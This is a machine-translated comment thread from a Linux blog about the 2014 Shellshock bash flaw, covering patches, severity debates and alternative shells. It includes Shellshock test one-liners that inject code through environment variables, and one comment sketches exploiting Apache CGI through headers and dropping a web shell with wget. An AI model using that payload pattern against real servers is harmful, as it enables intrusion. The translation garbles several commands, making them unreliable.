ನನ್ನನ್ನು ತಪ್ಪಾಗಿ ಅರ್ಥೈಸಬೇಡಿ, ನನ್ನ ಟೀಕೆ ರಾಬೆಟ್ನ ಸಂಪರ್ಕ ಮತ್ತು ಅದು ಅಸಂಗತತೆಯ ಮೇಲೆ ಕೇಂದ್ರೀಕರಿಸಿದೆ ಮತ್ತು ಪುನರುಕ್ತಿ ಅಲ್ಲ ಎಂಬ ಸುದ್ದಿಯಾಗಿದೆ ಎಂಬುದು ಸ್ಪಷ್ಟವಾಗಿದೆ ಎಂದು ನಾನು ಭಾವಿಸುತ್ತೇನೆ.
ಅದೇ ರೀತಿಯಲ್ಲಿ, ನಾವು ಅಪಾಯ ಮತ್ತು ಅಪಾಯದ ನಡುವೆ ವ್ಯತ್ಯಾಸವನ್ನು ತೋರಿಸಬೇಕು (ನಾನು ಎರಡನೆಯದನ್ನು ಉಲ್ಲೇಖಿಸುವುದಿಲ್ಲ), ನಾವು ಸಾಮಾನ್ಯವಾಗಿ ಅವುಗಳನ್ನು ಸಮಾನಾರ್ಥಕಗಳಾಗಿ ಬಳಸುತ್ತೇವೆ, ಆದರೆ ಇಲ್ಲಿ, ಅಪಾಯವು ದೋಷದ ಹಾನಿಯ ಸಾಮರ್ಥ್ಯವಾಗಿರುತ್ತದೆ ಮತ್ತು ಅದು ಸಂಭವಿಸುವ ಸಂಭವನೀಯತೆಯನ್ನು ಅಪಾಯಕ್ಕೆ ತರುತ್ತದೆ.
ನನ್ನ ನಿರ್ದಿಷ್ಟ ಸಂದರ್ಭದಲ್ಲಿ, ನಾನು ನಿನ್ನೆಯಿಂದ ಪ್ರವೇಶಿಸಿದೆ. ಇದು ಮೇಲಿಂಗ್ ಪಟ್ಟಿಗಳಿಗಾಗಿ ಅಥವಾ ಅಂತಹ ಯಾವುದಕ್ಕೂ ಅಲ್ಲ. ಇದು ಡೆಸ್ಕ್ಟಾಪ್ ಡಿಸ್ಟ್ರೋಗಾಗಿ! ನಾನು ಫೋನ್ ಎತ್ತಿಕೊಂಡು ಸೈಸಾಡ್ಮಿನ್ಗೆ ಲಿಂಕ್ನೊಂದಿಗೆ ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಿದೆ ಮತ್ತು ನಾನು ಎಲ್ಲವನ್ನೂ ತೇಪೆ ಹೊಂದಿದ್ದೇನೆ ಎಂದು ದೃ confirmed ಪಡಿಸಿದೆ, ನಂತರ ನನ್ನನ್ನು ಕ್ಷಮಿಸಿ ಆದರೆ ಈ ಸುದ್ದಿಗಳು ನನ್ನನ್ನು ಎಚ್ಚರವಾಗಿರಿಸುವುದಿಲ್ಲ.
ಇತರ ವೇದಿಕೆಗಳಲ್ಲಿ ಅವರು "ಡೆಬಿಯನ್ ಮತ್ತು ಉಬುಂಟು ಬಿಡುಗಡೆ ಮಾಡಿದ ಪರಿಹಾರ" ಎಂಬ ಬ್ಯಾಷ್ ದುರ್ಬಲತೆಯ ಬಗ್ಗೆ ಉಲ್ಲೇಖಿಸುತ್ತಾರೆ, ಆದರೆ ಇಂದು ಅವರು ದುರ್ಬಲತೆ ಇನ್ನೂ ಅಸ್ತಿತ್ವದಲ್ಲಿದೆ ಎಂದು ಕಂಡುಹಿಡಿದಿದ್ದಾರೆ, ಆದ್ದರಿಂದ ಪರಿಹಾರವು ಅಪೂರ್ಣವಾಗಿತ್ತು, ಅವರು ಅದನ್ನು ಉಲ್ಲೇಖಿಸುತ್ತಾರೆ!
ದುರ್ಬಲತೆಯ ತೀವ್ರತೆಯಿಂದ ಜನರನ್ನು ತಡೆಗಟ್ಟುವ ಸರಳ ಸತ್ಯಕ್ಕಾಗಿ ಅನೇಕರು ನನ್ನನ್ನು ಟೀಕಿಸಿದ್ದಾರೆ ಎಂದು ನಾನು ನೋಡುತ್ತೇನೆ-ಗರಿಷ್ಠ ಅಪಾಯದ 10 ನೇ ಹಂತದೊಂದಿಗೆ ಅರ್ಹತೆ ಪಡೆದಿದ್ದೇನೆ ಮತ್ತು ಬ್ಯಾಷ್ ಆತಿಥ್ಯ ವಹಿಸಿರುವ ಹಳತಾದ ಗ್ನು ಉಪಕರಣದ ಮೊದಲು ಲಿನಕ್ಸ್ ಸಾಫ್ಟ್ವೇರ್ಗೆ ಸಂಭವನೀಯ ಪರಿಹಾರಗಳನ್ನು ಪ್ರಸ್ತಾಪಿಸಿದೆ -ಇದು ಸಂಪೂರ್ಣವಾಗಿ ಗ್ನೂಗೆ ಸಾಧ್ಯವಾಯಿತು ಲಿನಕ್ಸ್ ಸಾಫ್ಟ್ವೇರ್ನಲ್ಲಿ ಬಿಎಸ್ಡಿ ಉಪಕರಣದೊಂದಿಗೆ ಬದಲಾಯಿಸಲಾಗುವುದು,… ನಾನು ಲಿನಕ್ಸ್ ಅನ್ನು ಸಹ ಬಳಸುತ್ತೇನೆ ಮತ್ತು ನಾನು ಲಿನಕ್ಸ್ ಅನ್ನು ಇಷ್ಟಪಡುತ್ತೇನೆ!
ಬಿಎಸ್ಡಿ ಯಲ್ಲಿ ಸ್ಥಾಪಿಸಲಾದ ಬ್ಯಾಷ್ ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ಬರುವುದಿಲ್ಲ ಎಂದು ನಾನು ಸ್ಪಷ್ಟಪಡಿಸುತ್ತೇನೆ, ಇದು ಬಿಎಸ್ಡಿ ಯಲ್ಲಿ ಸ್ಥಾಪಿಸಬಹುದಾದ ಮತ್ತೊಂದು ಲಿನಕ್ಸ್ ಹೊಂದಾಣಿಕೆ ಪ್ಯಾಕೇಜ್ ಆಗಿದೆ ... ಹೌದು!. ಮತ್ತು ಮೂಲವನ್ನು ಹಾಕಲಾಗುತ್ತದೆ ಇದರಿಂದ ಅವರು ಸುದ್ದಿಗಳನ್ನು ಪರಿಶೀಲಿಸಬಹುದು, ಏಕೆಂದರೆ ಅನೇಕ ಬಳಕೆದಾರರು ಕೆಲವೊಮ್ಮೆ ಸಂದೇಶ ಅಥವಾ ಕಾಮೆಂಟ್ ಅನ್ನು ನಂಬುವುದಿಲ್ಲ.
ರೋಬೆಟ್: ಅವರು ಈಗಾಗಲೇ ನಿಮಗೆ ಮತ್ತೆ ಮತ್ತೆ ಹೇಳಿದಂತೆ, ನೀವು ಈಗಾಗಲೇ ನಿಮ್ಮ ಕಾಮೆಂಟ್ ಅನ್ನು ಸುದ್ದಿಯೊಂದಿಗೆ ಪೋಸ್ಟ್ನಲ್ಲಿ ಇರಿಸಿದ್ದೀರಿ, ನೀವು ಕಾಮೆಂಟ್ ಮಾಡುವ ಪ್ರತಿಯೊಂದು ಪೋಸ್ಟ್ನಲ್ಲೂ ಅದನ್ನು ಹಾಕಬೇಕಾಗಿಲ್ಲ.
ಬ್ಯಾಷ್ ಬಗ್ಗೆ, ಬ್ಯಾಷ್ ದುರ್ಬಲವಾಗಿದ್ದರೆ ಇತರ ಚಿಪ್ಪುಗಳನ್ನು ಬಳಸಬಹುದು. 😉
ರೋಬೆಟ್, ನನ್ನ ಜ್ಞಾನಕ್ಕೆ ಲಿನಕ್ಸ್ ಕರ್ನಲ್ ಅನ್ನು ಬಿಎಸ್ಡಿ ಯೂಸರ್ ಲ್ಯಾಂಡ್ ನೊಂದಿಗೆ ಸಂಯೋಜಿಸುವ ಯಾವುದೇ ಸಾಫ್ಟ್ವೇರ್ ಇಲ್ಲ. ಜೆಂಟೂ ಮತ್ತು ಡೆಬಿಯಾನ್ ನಂತಹ kBSD + GNU ನ ಹತ್ತಿರದ ವಿಷಯವೆಂದರೆ. ಇದಲ್ಲದೆ, ಬಿಎಸ್ಡಿ (1983) ನಂತರ ಗ್ನೂ (1977) ಅನ್ನು "ಹಳೆಯ-ಶೈಲಿಯ" ಎಂದು ಕರೆಯಲಾಗುವುದಿಲ್ಲ. ಅವರಿಬ್ಬರೂ ತಮ್ಮ ಯುನಿಕ್ಸ್ ಮೂಲವನ್ನು ಹಂಚಿಕೊಳ್ಳುತ್ತಾರೆ (ಆದರೆ ಕೋಡ್ ಅಲ್ಲ), ಲಿನಸ್ ಟಿ ಇನ್ನೂ ಮಗುವಾಗಿದ್ದಾಗ ಬ್ಯಾಷ್ ಅನ್ನು ರಚಿಸಿದರೆ "ಲಿನಕ್ಸ್ ಹೊಂದಾಣಿಕೆ" ಇರುವುದಿಲ್ಲ.
uff, ಈ ಸಮಯದಲ್ಲಿ ಡೆಬಿಯನ್ ಪರೀಕ್ಷೆಯು "ದುರ್ಬಲವಾಗಿದೆ" ನಮ್ಮಲ್ಲಿ ಏನು ಇದೆ ...
ನಾನು ಡೆಬಿಯನ್ ಪರೀಕ್ಷೆಯನ್ನು ಬಳಸುತ್ತೇನೆ ಮತ್ತು ಈ ಶಾಖೆಯಲ್ಲಿಯೂ ನಾವು ಬ್ಯಾಷ್ ನವೀಕರಣವನ್ನು ಸ್ವೀಕರಿಸಿದ್ದೇವೆ
ಜೆನ್ಬೆಟಾ ಪ್ರಕಾರ ಮತ್ತೊಂದು ದುರ್ಬಲತೆಯೂ ಇದೆ
http://seclists.org/oss-sec/2014/q3/685
ಸಮಾಲೋಚಿಸುವ ಆಜ್ಞೆ
env X = '() {(a) => sh' sh -c "ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ"; bash -c "ಪ್ರತಿಧ್ವನಿ ವೈಫಲ್ಯ 2 ಅನ್ಪ್ಯಾಚ್ಡ್"
env X = '() {(a) => sh' sh -c "ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ"; bash -c "ಪ್ರತಿಧ್ವನಿಸದ ವೈಫಲ್ಯ 2" sh: X: line 1: ಅನಿರೀಕ್ಷಿತ ಅಂಶದ ಬಳಿ ಸಿಂಟ್ಯಾಕ್ಟಿಕ್ ದೋಷ `= 'sh: X: line 1:`' sh: `X 'sh ಗಾಗಿ ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನವನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುವಲ್ಲಿ ದೋಷ : ದುರ್ಬಲ: ಆಜ್ಞೆಯು ಕಂಡುಬಂದಿಲ್ಲ ಪ್ಯಾಚಿಂಗ್ ಇಲ್ಲದೆ ವೈಫಲ್ಯ 2ಅದೇ ನನಗೆ.
ಇಲ್ಲಿಯೂ ಅದೇ. ಆದರೆ ಪೋಸ್ಟ್ನಲ್ಲಿನ ಮೂಲ ದೋಷವನ್ನು (ಎಲ್) ಉಬುಂಟು 14.04 ರಲ್ಲಿ ಪ್ಯಾಚ್ ಮಾಡಲಾಗಿದೆ
ಸರಳ ಪ್ರತಿಧ್ವನಿ ಮಾಡುವ ಬದಲು, ಸವಲತ್ತುಗಳ ಅಗತ್ಯವಿರುವ ಸೂಚನೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಪ್ರಯತ್ನಿಸಿ, ನಾನು "ಸಾಕಷ್ಟು ಸವಲತ್ತುಗಳನ್ನು" ಎಸೆಯುತ್ತೇನೆ ... ಈ ದೋಷವು ಸವಲತ್ತುಗಳನ್ನು ಹೆಚ್ಚಿಸುವುದಿಲ್ಲವೇ? ಅದು ಸವಲತ್ತುಗಳನ್ನು ಹೆಚ್ಚಿಸದಿದ್ದರೆ ಅವರು ಅದನ್ನು ಚಿತ್ರಿಸುವಷ್ಟು ಅಪಾಯಕಾರಿ ಅಲ್ಲ .
ನೀನು ಸರಿ!! ಅವು ಎರಡು ದೋಷಗಳಾಗಿವೆ ...
ಕಳೆದ ರಾತ್ರಿ ಉಬುಂಟು ರೆಪೊಸಿಟರಿಗಳಲ್ಲಿ ಅವರು ಹಾಕಿದ ಎರಡನೇ ಬ್ಯಾಷ್ ಅಪ್ಡೇಟ್ನ ನಂತರ ಲಿನಕ್ಸ್ ಮಿಂಟ್ 17 ರಲ್ಲಿ ನನಗೆ, ಆ ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವಾಗ ಶೆಲ್ ಈ output ಟ್ಪುಟ್ ನೀಡುತ್ತದೆ:
env X = '() {(a) => sh' sh -c "ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ"; bash -c "ಪ್ರತಿಧ್ವನಿ ವಿಫಲ 2 ಅನ್ಪ್ಯಾಚ್ಡ್"
>
ಹಿಂದಿನದನ್ನು ನವೀಕರಿಸಲು ಉಬುಂಟು ರೆಪೊಸಿಟರಿಗಳಲ್ಲಿ ಇರಿಸಲಾದ "ಬಾಷ್" ನ ಆವೃತ್ತಿ:
4.3-7 ಉಬುಂಟು 1.2
ಡೆಬಿಯನ್ ಪಡೆದ ವ್ಯವಸ್ಥೆಗಳಲ್ಲಿ ನೀವು ಈ ಆಜ್ಞೆಯೊಂದಿಗೆ ಸ್ಥಾಪಿಸಲಾದ ಆವೃತ್ತಿಯನ್ನು ಪರಿಶೀಲಿಸಬಹುದು:
dpkg -s bash | grep ಆವೃತ್ತಿ
ಹೇಗಾದರೂ, ಇದನ್ನು ಸ್ಪಷ್ಟಪಡಿಸಬೇಕು, ಕನಿಷ್ಠ ಡೆಬಿಯನ್, ಉಬುಂಟು ಮತ್ತು ಮಿಂಟ್ ಬಳಕೆದಾರರಿಗೆ; ನೀವು ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು #!
ಡೆಬಿಯನ್ ಆಲ್ಕೆಮಿಸ್ಟ್ ಕನ್ಸೋಲ್ (ಡ್ಯಾಶ್) ಒಂದು ಪಡೆದ POSIX ಕನ್ಸೋಲ್ ಆಗಿದೆ
ಬೂದಿಯ.
.
ಇದು ಬ್ಯಾಷ್ಗಿಂತ ವೇಗವಾಗಿ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ ಮತ್ತು ಕಡಿಮೆ ಅವಲಂಬನೆಗಳನ್ನು ಹೊಂದಿರುತ್ತದೆ
ಗ್ರಂಥಾಲಯಗಳು (ಸಾಫ್ಟ್ವೇರ್ ವೈಫಲ್ಯಗಳ ವಿರುದ್ಧ ಇದು ಹೆಚ್ಚು ದೃ ust ವಾಗಿರುತ್ತದೆ ಅಥವಾ
ಹಾರ್ಡ್ವೇರ್), ಇದನ್ನು ಸಿಸ್ಟಮ್ಗಳಲ್ಲಿ ಡೀಫಾಲ್ಟ್ ಸಿಸ್ಟಮ್ ಕನ್ಸೋಲ್ ಆಗಿ ಬಳಸಲಾಗುತ್ತದೆ
ಡೆಬಿಯನ್.
ಆದ್ದರಿಂದ, ಕನಿಷ್ಠ ಉಬುಂಟುನಲ್ಲಿ, "ಬ್ಯಾಷ್" ಅನ್ನು ಬಳಕೆದಾರರ ಲಾಗಿನ್ಗಾಗಿ ಶೆಲ್ ಆಗಿ ಬಳಸಲಾಗುತ್ತದೆ (ಮೂಲ ಬಳಕೆದಾರರಿಗೂ ಸಹ). ಆದರೆ ಯಾವುದೇ ಬಳಕೆದಾರರು ಬಳಕೆದಾರ ಮತ್ತು ರೂಟ್ ಕನ್ಸೋಲ್ಗಳಿಗೆ (ಟರ್ಮಿನಲ್ಗಳು) ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ಮತ್ತೊಂದು ಶೆಲ್ ಅನ್ನು ಬಳಸಬಹುದು.
ಈ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಮೂಲಕ ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು (#! / Bin / sh) ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ ಎಂದು ಪರಿಶೀಲಿಸುವುದು ಸುಲಭ:
ಫೈಲ್ / ಬಿನ್ / ಶ
(output ಟ್ಪುಟ್ / bin / sh: `ಡ್ಯಾಶ್ 'ಗೆ ಸಾಂಕೇತಿಕ ಲಿಂಕ್ ಆಗಿದೆ) ನಾವು ಆಜ್ಞೆಯನ್ನು ಪುನರಾವರ್ತಿಸುವ ಜಾಡನ್ನು ಅನುಸರಿಸುತ್ತೇವೆ
ಫೈಲ್ / ಬಿನ್ / ಡ್ಯಾಶ್
(/ ಟ್ಪುಟ್ / ಬಿನ್ / ಡ್ಯಾಶ್: ಇಎಲ್ಎಫ್ 64-ಬಿಟ್ ಎಲ್ಎಸ್ಬಿ ಹಂಚಿದ ವಸ್ತು, x86-64, ಆವೃತ್ತಿ 1 (ಎಸ್ವೈಎಸ್ವಿ) ಆದ್ದರಿಂದ ಇದು ಕಾರ್ಯಗತಗೊಳ್ಳುತ್ತದೆ.
ಇದು ಲಿನಕ್ಸ್ ಮಿಂಟ್ 17 ವಿತರಣೆಯ ಫಲಿತಾಂಶಗಳು.ಉಬುಂಟು ಅಲ್ಲದ / ಡೆಬಿಯನ್ ಆಧಾರಿತ ವಿತರಣೆಗಳಲ್ಲಿ ಅವು ವಿಭಿನ್ನವಾಗಿರಬಹುದು.
ಡೀಫಾಲ್ಟ್ ಶೆಲ್ ಅನ್ನು ಬದಲಾಯಿಸುವುದು ಕಷ್ಟವಲ್ಲ !! ಬಳಕೆದಾರರಿಗಾಗಿ ಮತ್ತು ಮೂಲ ಬಳಕೆದಾರರಿಗಾಗಿ ನೀವು ಬೇರೆ ಒಂದನ್ನು ಸಹ ಬಳಸಬಹುದು. ವಾಸ್ತವವಾಗಿ ನೀವು ನಿಮ್ಮ ಆಯ್ಕೆಯ ಶೆಲ್ ಅನ್ನು ಸ್ಥಾಪಿಸಬೇಕು ಮತ್ತು ಡೀಫಾಲ್ಟ್ ಅನ್ನು "chsh" ಆಜ್ಞೆಯೊಂದಿಗೆ ಅಥವಾ / etc / passwd ಫೈಲ್ ಅನ್ನು ಸಂಪಾದಿಸುವ ಮೂಲಕ ಬದಲಾಯಿಸಬೇಕು (ಆದರೂ "passwd" ಫೈಲ್ ಅನ್ನು ಸಂಪಾದಿಸುವಾಗ ದೋಷದ ಪರಿಣಾಮಗಳನ್ನು ತಿಳಿದಿಲ್ಲದ ಬಳಕೆದಾರರು, ಅವರು ತಮ್ಮನ್ನು ಚೆನ್ನಾಗಿ ತಿಳಿಸುವುದು ಉತ್ತಮ ಮತ್ತು ಅದನ್ನು ಸಂಪಾದಿಸುವ ಮೊದಲು, ಅದನ್ನು ಮರುಪಡೆಯಲು ಅಗತ್ಯವಿದ್ದಲ್ಲಿ ಮೂಲದ ನಕಲನ್ನು ಮಾಡಿ).
ನಾನು "tcsh" ನೊಂದಿಗೆ ಹೆಚ್ಚು ಹಾಯಾಗಿರುತ್ತೇನೆ (tcsh ಆಗಿದೆ :)
TENEX C ಕನ್ಸೋಲ್, ಬರ್ಕ್ಲಿ csh ನ ಸುಧಾರಿತ ಆವೃತ್ತಿ
"Csh" ಅನ್ನು ಮ್ಯಾಕ್ ಒಎಸ್ ಎಕ್ಸ್ ಕೆಲವು ವರ್ಷಗಳ ಹಿಂದೆ ಬಳಸಿದೆ. ಆಪಲ್ನ ಹೆಚ್ಚಿನ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ಫ್ರೀಬಿಎಸ್ಡಿ ಕೋಡ್ ಎಂದು ಪರಿಗಣಿಸುವುದರಲ್ಲಿ ಇದು ಅರ್ಥಪೂರ್ಣವಾಗಿದೆ. ಈಗ ನಾನು ನಿನ್ನೆ ಓದಿದ ವಿಷಯದಿಂದ, ಅವರು ಬಳಕೆದಾರ ಟರ್ಮಿನಲ್ಗಳಿಗೆ "ಬ್ಯಾಷ್" ಅನ್ನು ಸಹ ಒದಗಿಸುತ್ತಾರೆ ಎಂದು ತೋರುತ್ತದೆ.
ತೀರ್ಮಾನ:
- ಹೆಚ್ಚು ಬಳಸಿದ ವಿತರಣೆಗಳಿಗಾಗಿ ಪ್ಯಾಚ್ ಮಾಡಲಾದ "ಬ್ಯಾಷ್" ಆವೃತ್ತಿಗಳನ್ನು "ಈಗಾಗಲೇ ವಿತರಿಸಲಾಗಿದೆ
- "ಬ್ಯಾಷ್" ಆವೃತ್ತಿ 4.3-7ubuntu1.2 ಮತ್ತು ನಂತರ ಈ ದೋಷಗಳನ್ನು ಒಳಗೊಂಡಿಲ್ಲ
- ಓಎಸ್ * ಲಿನಕ್ಸ್ನಲ್ಲಿ "ಬ್ಯಾಷ್" ಅನ್ನು ಬಳಸುವುದು ಕಡ್ಡಾಯವಲ್ಲ
- ಕೆಲವು * ಲಿನಕ್ಸ್ ವಿತರಣೆಗಳ ಲಿಂಕ್ #! / Bin / sh "bash" ನೊಂದಿಗೆ
- ಪರ್ಯಾಯ ಮಾರ್ಗಗಳಿವೆ: ಬೂದಿ, ಡ್ಯಾಶ್, ಸಿಶ್, ಟಿಸಿಶ್ ಮತ್ತು ಇನ್ನೂ ಕೆಲವು
- ಟರ್ಮಿನಲ್ ತೆರೆಯುವಾಗ ಸಿಸ್ಟಮ್ ಕರೆಯುವ ಡೀಫಾಲ್ಟ್ ಶೆಲ್ ಅನ್ನು ಬದಲಾಯಿಸುವುದು ಸಂಕೀರ್ಣವಾಗಿಲ್ಲ
- ಕೆಲವು ಸಣ್ಣ ಸಾಧನಗಳು (ಮಾರ್ಗನಿರ್ದೇಶಕಗಳು ಮತ್ತು ಇತರರು) "ಬ್ಯಾಷ್" ಅನ್ನು ಬಳಸುತ್ತವೆ, ಏಕೆಂದರೆ ಅದು ತುಂಬಾ ದೊಡ್ಡದಾಗಿದೆ !!
ಇದೀಗ ಮತ್ತೊಂದು ಅಪ್ಡೇಟ್ ಬಂದಿದ್ದು ಅದು "ಬ್ಯಾಷ್" 4.3-7ubuntu1.3 ನ ಮತ್ತೊಂದು ಆವೃತ್ತಿಯನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ
ಲಿನಕ್ಸ್ ಮಿಂಟ್ 17 ಮತ್ತು ಉಬುಂಟು 14.04.1 ಎಲ್ಟಿಎಸ್ಗಾಗಿ
ಆರ್ಚ್ ಲಿನಕ್ಸ್ ಆವೃತ್ತಿ ಬ್ಯಾಷ್ -4.3.026-1 ಅನ್ನು ನಮೂದಿಸಿದೆ
@ ಕ್ಸುರ್ಕ್ಸೊ… .ಬೆರ್ಕ್ಲಿಯಿಂದ ಸಿಎಸ್? ಆ ಸಾಧನವು ಲಿನಕ್ಸ್ ಸಾಫ್ಟ್ವೇರ್ಗೆ ಉತ್ತಮವಾಗಿದೆ.
ಇದು ದೋಷ ಎಂದು ನಾನು ess ಹಿಸುತ್ತೇನೆ
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
ನಿಜವೇ?
ಮತ್ತು ಪರಿಹಾರ ಏನು?
ನಿಮ್ಮ ಡಿಸ್ಟ್ರೊದಲ್ಲಿ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನವೀಕರಿಸಲು ಅವರು ಕಾಯಿರಿ
ದೋಷವನ್ನು ಶೆಲ್ ಶಾಕ್ ಎಂದು ಬ್ಯಾಪ್ಟೈಜ್ ಮಾಡಲಾಯಿತು
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
ದುರ್ಬಲ
ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ಉಬುಂಟು ಸ್ಟುಡಿಯೋ 14.04 ಗೆ ಇನ್ನೂ ಪ್ಯಾಚ್ ಇಲ್ಲ
ಉಬುಂಟು ಸ್ಟುಡಿಯೋದಲ್ಲಿ ದುರಸ್ತಿ ಮಾಡಲಾಗಿದೆ 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ"
ಬ್ಯಾಷ್: ಎಚ್ಚರಿಕೆ: x: ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನ ಪ್ರಯತ್ನವನ್ನು ನಿರ್ಲಕ್ಷಿಸುವುದು
ಬ್ಯಾಷ್: `x 'ಗಾಗಿ ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನವನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುವಲ್ಲಿ ದೋಷ
ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ವಾಸ್ತವವಾಗಿ ಇದು ಒಂದು ಸಣ್ಣ ದುರ್ಬಲತೆಯಾಗಿದೆ, ಅದು ನಿಮ್ಮ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರಿದರೆ ನೀವು ಮೊದಲು ಏನಾದರೂ ತಪ್ಪು ಮಾಡುತ್ತಿದ್ದೀರಿ ...
ಏಕೆಂದರೆ ಮೂಲ ಸವಲತ್ತುಗಳೊಂದಿಗೆ ಚಲಿಸುವ ಬ್ಯಾಷ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಎಂದಿಗೂ ಬಳಕೆದಾರರಿಗೆ ಒಡ್ಡಬಾರದು. ಮತ್ತು ಅವನು ಸವಲತ್ತುಗಳಿಲ್ಲದೆ ಓಡುತ್ತಿದ್ದರೆ, ಅಂತಹ ಬೆದರಿಸುವಿಕೆ ಇಲ್ಲ. ವಾಸ್ತವವಾಗಿ, ಇದು ಅಸಂಬದ್ಧವಾಗಿದೆ. ಹೆಚ್ಚು ಹೆದರಿಕೆ.
ನಾನು ಅದೇ ಭಾವಿಸುತ್ತೇನೆ.
ನಿಖರವಾಗಿ, ಹೆಚ್ಚಿನ ಪತ್ರಿಕೆಗಳನ್ನು ಮಾರಾಟ ಮಾಡಲು ಅಥವಾ ಹೆಚ್ಚಿನ ಭೇಟಿಗಳನ್ನು ಪಡೆಯಲು, ಈ ದೋಷಗಳು ಒಳ್ಳೆಯದು.
ಆದರೆ ಈ ರೀತಿಯ ಸ್ಕ್ರಿಪ್ಟ್ಗಳೊಂದಿಗೆ ಕಂಪ್ಯೂಟರ್ ಅನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಲು, ನೀವು ಮೊದಲು ಬ್ಯಾಷ್ಗೆ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿರಬೇಕು ಮತ್ತು ನಂತರ ಅದನ್ನು ಮೂಲವಾಗಿ ಹೊಂದಿರಬೇಕು ಎಂದು ನಮೂದಿಸುವುದನ್ನು ಅವರು ಯಾವಾಗಲೂ ಮರೆಯುತ್ತಾರೆ.
ಸಿಬ್ಬಂದಿ ನೀವು ಸಿಜಿ ಯೊಂದಿಗೆ ಅಪಾಚೆ ಬಳಸಿದರೆ, http ಹೆಡರ್ ಗಳನ್ನು ಕುಕೀಗಳಾಗಿ ಇರಿಸಿ ಅಥವಾ ನೀವು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಬಯಸುವ ಕಾರ್ಯವನ್ನು ಉಲ್ಲೇಖಿಸಿ. ಹುಳುಗಳನ್ನು ಹರಡಲು ಸಹ ಇದನ್ನು ಬಳಸಲಾಗುತ್ತದೆ.
ಮತ್ತು ಯಾರಾದರೂ wget mishell.php ನೊಂದಿಗೆ ಸರ್ವರ್ಗೆ ಶೆಲ್ ಹಾಕಿದರೆ, ಅದು ಗಂಭೀರವಾದ ಹಕ್ಕಲ್ಲವೇ?
ನಿನ್ನ ಮಾತನ್ನು ಒಪ್ಪುತ್ತೇನೆ. ಇದು ಹಾರ್ಟ್ಬಲ್ಡ್ನಲ್ಲಿರುವಂತಹ ದೊಡ್ಡ ದೋಷ ಎಂದು ನಾನು ಭಾವಿಸಿದೆವು (ಎನ್ಎಸ್ಎ ಸಹ ಅಸ್ವಸ್ಥತೆಯನ್ನು ಉತ್ತೇಜಿಸಲು ಸಾಲ ನೀಡಿತು), ಆದರೆ ಎಲ್ಲಾ ನಂತರ ಅದು ಸಣ್ಣ ದೋಷವಾಗಿದೆ.
ಫ್ಲ್ಯಾಶ್ನ ಅಸಾಮಾನ್ಯ ಬಳಕೆ ಮತ್ತು ಪೆಪ್ಪರ್ ಫ್ಲ್ಯಾಶ್ ಪ್ಲೇಯರ್ನಲ್ಲಿನ ಕಾರ್ಯಕ್ಷಮತೆಯ ನಿಧಾನಗತಿಯಂತಹ ಇತರ ಗಂಭೀರ ದೋಷಗಳಿವೆ ಮತ್ತು ಈಗಾಗಲೇ ಪರಿಹರಿಸಲಾಗಿದೆ Chrome ಮತ್ತು Firefox ನಲ್ಲಿ ವೆಬ್ಆರ್ಟಿಸಿ ದೋಷ.
ಲಿನಕ್ಸ್ ಮಿಂಟ್ 16 ಹೊಂದಿರುವ ಜನರಿಗೆ ಇದು ವ್ಯವಸ್ಥೆಯನ್ನು ಹೊಂದಿದೆಯೇ ಎಂದು ನಿಮಗೆ ತಿಳಿದಿದೆಯೇ?
ಡೆಬಿಯನ್ ಪರೀಕ್ಷೆಯಲ್ಲಿ ಅದನ್ನು ಈಗಾಗಲೇ ಸರಿಪಡಿಸಲಾಗಿದೆ.
ನನ್ನ 5 ಡಿಸ್ಟ್ರೋಗಳಲ್ಲಿ ಇದನ್ನು ಪರಿಹರಿಸಲಾಗಿದೆ, ನನ್ನ ಓಎಸ್ ಎಕ್ಸ್ ನಲ್ಲಿ ನನಗೆ ಗೊತ್ತಿಲ್ಲ.
ದಯವಿಟ್ಟು, ನನ್ನ ಕಾಮೆಂಟ್ ಅನ್ನು ಸೆನ್ಸಾರ್ ಮಾಡಬೇಡಿ, ನಾನು ಓಎಸ್ ಎಕ್ಸ್ ಎಂದು ಹೇಳಿದೆ. ಈ ಸೈಟ್ನಲ್ಲಿ ನೀವು ಓಎಸ್ ಎಕ್ಸ್ ಅನ್ನು ಹೇಳಬಹುದೇ ಎಂದು ನನಗೆ ಗೊತ್ತಿಲ್ಲ.
